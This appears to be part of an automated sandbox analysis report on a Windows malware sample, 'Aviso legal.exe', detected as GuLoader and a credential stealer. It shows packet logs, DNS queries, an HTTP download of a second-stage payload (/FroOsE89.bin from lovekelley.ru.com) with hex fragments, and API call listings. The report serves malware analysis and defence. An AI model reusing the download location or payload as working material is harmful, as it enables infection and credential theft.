May 22, 2024 20:31:39.996052980 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:39.997960091 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.997975111 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:39.998306036 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.000134945 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.000149965 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.000361919 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.002342939 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.002357960 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.002573967 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.004410982 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.004508972 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.004771948 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.006633043 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.006747007 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.006942034 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.006942034 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.008785963 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.008800983 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.009128094 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.011018038 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.011033058 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.011260033 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.013055086 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.013166904 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.013257980 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.013350964 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.015181065 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.015288115 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.015415907 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.015490055 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.017353058 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.017452002 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.017600060 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.017690897 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.019546032 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.019642115 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.019809961 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.019885063 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.026360035 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.026468039 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.026717901 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.030826092 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.030941010 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.031162024 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.038001060 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.038117886 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.038202047 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.038290977 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.044836044 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.044850111 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.045093060 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.051654100 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.051670074 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.051893950 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:40.058461905 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:40.058696985 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:31:41.769321918 CEST	49796	443	192.168.11.20	104.26.12.205
May 22, 2024 20:31:41.769346952 CEST	443	49796	104.26.12.205	192.168.11.20
May 22, 2024 20:31:41.770241976 CEST	49796	443	192.168.11.20	104.26.12.205
May 22, 2024 20:31:41.783468008 CEST	49796	443	192.168.11.20	104.26.12.205
May 22, 2024 20:31:41.783474922 CEST	443	49796	104.26.12.205	192.168.11.20
May 22, 2024 20:31:42.145601988 CEST	443	49796	104.26.12.205	192.168.11.20
May 22, 2024 20:31:42.146598101 CEST	49796	443	192.168.11.20	104.26.12.205
May 22, 2024 20:31:42.147721052 CEST	49796	443	192.168.11.20	104.26.12.205
May 22, 2024 20:31:42.147726059 CEST	443	49796	104.26.12.205	192.168.11.20
May 22, 2024 20:31:42.147984982 CEST	443	49796	104.26.12.205	192.168.11.20
May 22, 2024 20:31:42.178507090 CEST	49796	443	192.168.11.20	104.26.12.205
May 22, 2024 20:31:42.220176935 CEST	443	49796	104.26.12.205	192.168.11.20
May 22, 2024 20:31:42.622144938 CEST	443	49796	104.26.12.205	192.168.11.20
May 22, 2024 20:31:42.622205973 CEST	443	49796	104.26.12.205	192.168.11.20
May 22, 2024 20:31:42.623277903 CEST	49796	443	192.168.11.20	104.26.12.205
May 22, 2024 20:31:42.624605894 CEST	49796	443	192.168.11.20	104.26.12.205
May 22, 2024 20:31:44.812458038 CEST	80	49794	172.93.121.7	192.168.11.20
May 22, 2024 20:31:44.812674046 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:33:28.489192009 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:33:29.004561901 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:33:30.019934893 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:33:32.050760031 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:33:36.096785069 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:33:44.188710928 CEST	49794	80	192.168.11.20	172.93.121.7
May 22, 2024 20:34:00.357021093 CEST	49794	80	192.168.11.20	172.93.121.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 22, 2024 20:31:38.497641087 CEST	59066	53	192.168.11.20	1.1.1.1
May 22, 2024 20:31:38.745045900 CEST	53	59066	1.1.1.1	192.168.11.20
May 22, 2024 20:31:41.588360071 CEST	63067	53	192.168.11.20	1.1.1.1
May 22, 2024 20:31:41.764492035 CEST	53	63067	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 22, 2024 20:31:38.497641087 CEST	192.168.11.20	1.1.1.1	0x6c77	Standard query (0)	lovekelley.ru.com	A (IP address)	IN (0x0001)	false
May 22, 2024 20:31:41.588360071 CEST	192.168.11.20	1.1.1.1	0x1513	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 22, 2024 20:31:38.745045900 CEST	1.1.1.1	192.168.11.20	0x6c77	No error (0)	lovekelley.ru.com	172.93.121.7	A (IP address)	IN (0x0001)	false
May 22, 2024 20:31:41.764492035 CEST	1.1.1.1	192.168.11.20	0x1513	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
May 22, 2024 20:31:41.764492035 CEST	1.1.1.1	192.168.11.20	0x1513	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
May 22, 2024 20:31:41.764492035 CEST	1.1.1.1	192.168.11.20	0x1513	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

lovekelley.ru.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49794	172.93.121.7	80	6196	C:\Users\user\Desktop\Aviso legal.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 20:31:38.956564903 CEST	174	OUT	GET /FroOsE89.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: lovekelley.ru.com Cache-Control: no-cache
May 22, 2024 20:31:39.164582968 CEST	1289	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 18:31:38 GMT Server: Apache Last-Modified: Wed, 22 May 2024 07:33:48 GMT Accept-Ranges: bytes Content-Length: 243264 Content-Type: application/octet-stream Data Raw: 04 bb 2c c3 ba 40 74 69 5e 39 b4 20 c9 5d 0e a2 fd 48 e0 7b b1 cf 2a a1 a6 ab ea 0a 65 3b 27 6b 5d 35 f7 e5 bc b0 ba d7 1d 1b cd 73 c7 dc 61 7d 07 56 ff b5 77 1c e7 8f 68 76 5c 76 d6 4c 88 55 c0 98 d1 77 0d 7e eb 62 d5 a9 ab b7 40 5f aa 92 33 bd a8 25 4a 2f 1a 0b 36 37 8b c7 75 31 e5 f4 a1 a6 b6 e9 cc 14 d0 65 39 0d b1 c7 93 7b d9 96 05 0d 5d e0 a6 d4 ab cb a4 08 1b 1b 80 5a 75 0b 42 60 79 da f4 c0 c8 07 5a ab 74 c7 78 cc 7e 4e 91 37 d2 7b c5 6d 74 e8 fa 7d 13 ad a0 04 0d c5 f5 1d 31 d4 1d 99 2e e0 0f 79 d0 ef 1f 52 3b 83 b7 ef 2b c5 31 38 cd 25 3f e3 f2 12 c0 fc cd 45 0c a6 68 21 5a d4 54 4d af 6d ce 24 e1 03 9c 16 38 e9 15 19 26 ea 0d 41 d3 05 d5 a9 c5 8b 75 0d a9 7e e7 c6 f4 5a 62 20 bc c8 12 52 3d 10 be 85 38 a9 a3 b3 12 cd a3 67 33 5c 00 8c 83 c6 ce 80 3e 21 cd ba 20 8a a6 ad 67 7b 72 0a 7f c2 37 8b 68 c6 e2 ed 73 23 6f 70 d9 e4 d5 f4 60 d9 b6 bc a2 04 10 5d 7a b0 f0 71 99 53 d6 a2 1d c1 8e 08 c0 c4 7f 9b 6b b1 98 c3 c8 fa 83 70 9f 9d 12 f4 b7 25 14 af b3 77 60 b9 dc 1f a9 c7 d8 54 70 95 02 61 [TRUNCATED] Data Ascii: ,@ti^9 ]H{e;'k]5sa}Vwhv\vLUw~b@_3%J/67u1e9{]ZuB`yZtx~N7{mt}1.yR;+18%?Eh!ZTMm$8&Au~Zb R=8g3\>! g{r7hs#op`]zqSkp%w`Tpac)/^7#Jc/dlb8i0\QJ'E^~?7~oPZWAE:G59nv#YL~0?:.]jU?Cf\!%s"2"r<K:lx=4DIAlfZT_CT\|bFf_12bhoA]k\|p57Deubw?vZ#t.x:vv%C<A\|I@\|orL @-kH-om;A4\2d;-@`EOxgGeYug@}2}~xI0d'[cyUD8CUyqfH"`g3\{`Gtt}}a]'Z{\|oYJl`T(qw9 {{xT"}b~'b?Ogo$fD8;m5woAWx@s^nm [TRUNCATED]
May 22, 2024 20:31:39.164630890 CEST	1289	IN	Data Raw: 26 91 0f 46 a1 e7 ff cd bf 78 80 79 40 63 8e 0c a5 45 76 c7 7e fd ac 0f c0 80 03 92 98 61 41 57 8d 62 bb 0d 15 f8 1a b6 74 62 09 48 69 b7 d0 5d db 49 6f fc d1 0a c8 df 4f a7 5f 08 0a e1 64 d1 ac 9f 2a ac e1 7b 4a a6 4a 9e 9b 92 fb bc b4 9b e1 6a Data Ascii: &Fxy@cEv~aAWbtbHi]IoO_d{JJj[fUn=1B`"hd'+~35ZA$T)W,WsQ[AnxvxH#tCaM!3:#r .o41
May 22, 2024 20:31:39.166707039 CEST	1289	IN	Data Raw: 11 36 6d c5 1c 2e 12 12 c9 81 2d 68 2c fb 93 c1 2f c7 69 2b f1 cd f5 56 2d bf bb 3a fc c5 a7 a0 1f 7c 9c 1d 37 f4 cf 03 60 9c 33 ef ee 61 23 55 71 b1 5f 9f 97 7f 3f c3 04 45 f0 c4 07 ee f6 29 1d f0 25 1c f0 dc 39 eb 4c 6c 16 3f ac 30 a8 7c 4f 03 Data Ascii: 6m.-h,/i+V-:\|7`3a#Uq_?E)%9Ll?0\|Om.^wt/Yu#aiHl~7Dylug8)aDDWR$ `yO\C\m\|=CW!/>YHDv`VhT=u]w/ %Cf
May 22, 2024 20:31:39.166754961 CEST	1289	IN	Data Raw: 8c a4 a3 65 53 9e 0b 7f c4 1d 95 6a 9d 01 ed 73 25 45 52 db e7 a8 13 62 d9 f2 13 bc 06 7b b5 7a a0 f4 5b bb 51 c5 df f5 d1 8e 0c ea da 7d e0 92 b1 98 c7 e2 d8 81 73 e2 74 12 f4 0f c6 09 ad 87 9d 60 b9 d8 d5 88 c5 9d 2c 9a 95 02 65 49 19 b2 b0 5e Data Ascii: eSjs%ERb{z[Q}st`,eI^-9-RA#7'h&g,ohfp8h2"Z[JZL^\|=5-V8X`h\|CNe4AGocv'[R+Uc{eytYTj1
May 22, 2024 20:31:39.168845892 CEST	1289	IN	Data Raw: c6 86 13 c6 f4 92 e2 e4 1a be 38 e3 9d 4f 10 e0 6a 62 7e ec bd fa 56 57 5a e0 c8 7d c5 d8 a4 8f fc 57 02 9f 4a 1f f0 23 d0 16 d8 b9 be ed 7d 06 28 af b0 ce f1 a2 67 26 59 b1 43 a7 d1 5e 77 44 8b 29 19 dd 83 a8 06 aa fc e3 7e ff e2 65 f8 6a 93 c9 Data Ascii: 8Ojb~VWZ}WJ#}(g&YC^wD)~ejJ\}-7;G'>^9\8~r{_P>/.DRfp#aiG3qgSfL^{Ku3^knyp[v7tbl%#V5
May 22, 2024 20:31:39.168894053 CEST	1289	IN	Data Raw: 22 c9 21 43 8d 22 2d 18 e3 60 fd c0 93 57 fa 1f 77 43 db 59 07 9b 96 89 e9 89 9a e1 64 00 55 9b 02 52 76 96 84 6d d8 81 02 9a e1 68 3c 31 40 a3 04 f5 8d 1c 7e d3 9c 08 9f 22 1e ad f0 96 68 8e e4 f3 67 79 cd f8 a4 24 2b f7 0f 1b 7c 4c 05 b7 2a 20 Data Ascii: "!C"-`WwCYdURvmh<1@~"hgy$+\|L* a)n(r3z,},4. tiMKy&9sJ#9!v@g)Vn4&e2=<E4!f96wK\|)Nzvyr
May 22, 2024 20:31:39.170985937 CEST	1289	IN	Data Raw: 75 c3 b0 21 71 f0 b4 2f 10 fb 28 1b fa 32 1e 8b 40 19 eb 48 46 34 15 ab 4f 34 7a ed 27 4b 48 d7 06 1b c8 5d 18 b3 43 02 fc c6 83 52 90 75 2f a1 5e b3 3c 1a 9b 01 57 93 42 6a f2 98 6e f1 a2 5e 32 6e b5 7b 02 fd a5 e1 60 d5 45 7d fe 67 48 d4 2c 63 Data Ascii: u!q/(2@HF4O4z'KH]CRu/^<WBjn^2n{`E}gH,cBZ?Ex#O5^o2s~QVZ=dYJLv`&Eh]~1rwr!#oZ4}qMX:6=UNN+ j ;j$CJ]
May 22, 2024 20:31:39.171036005 CEST	1289	IN	Data Raw: fd 6e 9f 9d 16 8a 2a ec 17 ab d4 4b 60 b9 d6 7f b7 c7 9e 55 50 90 02 61 63 f9 be cb b5 d2 e6 25 13 0f c2 d0 2f aa c3 5a a8 30 e2 a5 ba 5e df 3f 23 85 4e 27 da f1 ca d9 c0 64 80 d6 fc d1 6a 94 bd 84 92 dc 62 0d 30 ea 38 c6 81 0d 1f f7 86 1d 69 c4 Data Ascii: n*K`UPac%/Z0^?#N'djb08iy/\l4#q^&`;7^'PZW#gSuA9eE:5V#Yt~pNR0I:d^l'@cif\H%'6Yn.:d?k@1D.fPm\[1
May 22, 2024 20:31:39.173146963 CEST	1289	IN	Data Raw: a3 66 0e 68 99 49 ad f9 1a 05 43 81 d7 67 f5 90 8a 1f ac dc e1 80 f1 ee 9b f6 94 9f c5 2d aa 96 b1 6a b2 a2 a2 a5 2b cd b7 9c 83 f6 24 37 a1 86 3b 47 2d b3 ed e4 c7 f1 e2 52 39 5c 16 fc 84 05 ef 38 ab b2 12 bd dd ce a1 f3 36 11 fc cc 1b 81 8d 90 Data Ascii: fhICg-j+$7;G-R9\86pR>"KVQ)Op./VGX6=qSvmO\{p9<@NH~b/>%Jdw8H3Fe9N8l8'iYT4[b0T{*
May 22, 2024 20:31:39.173197031 CEST	1289	IN	Data Raw: e3 9d 0c 65 d0 10 ae 0e 64 65 8c cc 9e c0 78 e6 00 d8 85 2b d7 7a 33 6a 4c fb b3 54 0d eb 58 81 0f c4 d4 d0 fc ca 80 41 ea 6d 91 c4 6e c9 19 f2 2b 03 66 cc c2 a3 03 33 87 7f 2c 75 e6 2c dd af f0 43 1c df 8b 35 da 95 69 6d 1f a4 9e ee 1f e4 74 6f Data Ascii: edex+z3jLTXAmn+f3,u,C5imto'Ac9!v@o)V8"/?`9o"lj7?y"1NrHk#C0:CxaozYThQ\|j5GG<PSDT -#]XX
May 22, 2024 20:31:39.371903896 CEST	1289	IN	Data Raw: 01 ab 61 4d 6a d2 b3 69 f1 a2 7e cd 60 b6 7b 2a 07 ab e2 66 57 6f 73 fe 67 b6 2b 1b 45 18 42 a4 f4 b7 3c 98 87 e6 ab 78 04 0a b3 1d e7 45 90 f4 cc 35 54 ce 1e 80 1f ec 28 c5 d6 fc 99 cf 74 7d 7d fb e2 14 5d 55 a4 95 a0 ed 3d bb 0d 3c d8 82 9e 39 Data Ascii: aMji~`{*fWosg+EB<xE5T(t}}]U=<9Wr+v`]k=vU)1~{AX:tVnf< j:CJ]}i4fF}\D0)sRGx0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49796	104.26.12.205	443	6196	C:\Users\user\Desktop\Aviso legal.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 18:31:42 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-05-22 18:31:42 UTC	211	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 18:31:42 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 887ee27a3ca89b53-SEA
2024-05-22 18:31:42 UTC	12	IN	Data Raw: 38 31 2e 31 38 31 2e 36 30 2e 33 34 Data Ascii: 81.181.60.34

Target ID:	0
Start time:	14:30:54
Start date:	22/05/2024
Path:	C:\Users\user\Desktop\Aviso legal.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Aviso legal.exe"
Imagebase:	0x400000
File size:	841'240 bytes
MD5 hash:	C7AE7BFDA7F71B76C6F3213CFE94529E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1406570812.0000000005C09000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:31:25
Start date:	22/05/2024
Path:	C:\Users\user\Desktop\Aviso legal.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Aviso legal.exe"
Imagebase:	0x400000
File size:	841'240 bytes
MD5 hash:	C7AE7BFDA7F71B76C6F3213CFE94529E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.6069498581.00000000362C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	21.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16%
Total number of Nodes:	1564
Total number of Limit Nodes:	39

Executed Functions

Function 0040352D Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403550
GetVersionExW.KERNEL32(?), ref: 00403579
GetVersionExW.KERNEL32(0000011C), ref: 00403590
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
OleInitialize.OLE32(00000000), ref: 0040366A
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Aviso legal.exe",00000020,"C:\Users\user\Desktop\Aviso legal.exe",00000000), ref: 004036D6
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
DeleteFileW.KERNELBASE(1033), ref: 0040386F
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965

Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Aviso legal.exe",00000000,?), ref: 0040397C
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
CopyFileW.KERNEL32(C:\Users\user\Desktop\Aviso legal.exe,0042AA28,00000001), ref: 00403A0E
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
OleUninitialize.OLE32(?), ref: 00403A5E
ExitProcess.KERNEL32 ref: 00403A78
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
ExitProcess.KERNEL32 ref: 00403B0C

Strings

1033, xrefs: 0040386A
\Temp, xrefs: 00403820
TEMP, xrefs: 0040384E
C:\Users\user\Desktop, xrefs: 00403975, 0040397A, 004039AD
~nsu, xrefs: 0040394E
C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid, xrefs: 00403928
UXTHEME, xrefs: 0040361B, 00403620, 00403626
C:\Users\user\Desktop\Aviso legal.exe, xrefs: 00403A09
"C:\Users\user\Desktop\Aviso legal.exe", xrefs: 004036A3, 004036A9, 004036BE, 00403895, 004038A1, 004038EF, 004038F9
.tmp, xrefs: 0040396A
C:\Users\user\AppData\Local\Temp\, xrefs: 004037FE, 00403803, 00403819, 00403825, 00403834, 00403841, 0040384D, 00403855, 00403953, 00403964, 0040396F, 0040397B, 0040398C, 0040399B, 00403A51
Low, xrefs: 0040383C
TMP, xrefs: 00403856
NSIS Error, xrefs: 0040368E
SeShutdownPrivilege, xrefs: 00403AA1
Error launching installer, xrefs: 004038FF
C:\Users\user\AppData\Local\Temp\geokemi, xrefs: 004037EE, 0040391D, 004039A4, 004039AE

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\Aviso legal.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\geokemi$C:\Users\user\AppData\Local\Temp\geokemi\Threshers135\Polls\Overdid$C:\Users\user\Desktop$C:\Users\user\Desktop\Aviso legal.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-1444467751
Opcode ID: ea0cae1bb7d5915cd49b585c952b984ac3b7c511afb70fb70d540011af4007ef
Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
Opcode Fuzzy Hash: ea0cae1bb7d5915cd49b585c952b984ac3b7c511afb70fb70d540011af4007ef
Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040573C
GetDlgItem.USER32(?,000003EE), ref: 0040574B
GetClientRect.USER32(?,?), ref: 00405788
GetSystemMetrics.USER32(00000002), ref: 0040578F
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
ShowWindow.USER32(?,00000008), ref: 0040582B
GetDlgItem.USER32(?,000003EC), ref: 0040584C
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
GetDlgItem.USER32(?,000003F8), ref: 0040575A

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

GetDlgItem.USER32(?,000003EC), ref: 0040589E
CreateThread.KERNELBASE(00000000,00000000,Function_00005672,00000000), ref: 004058AC
FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058B3
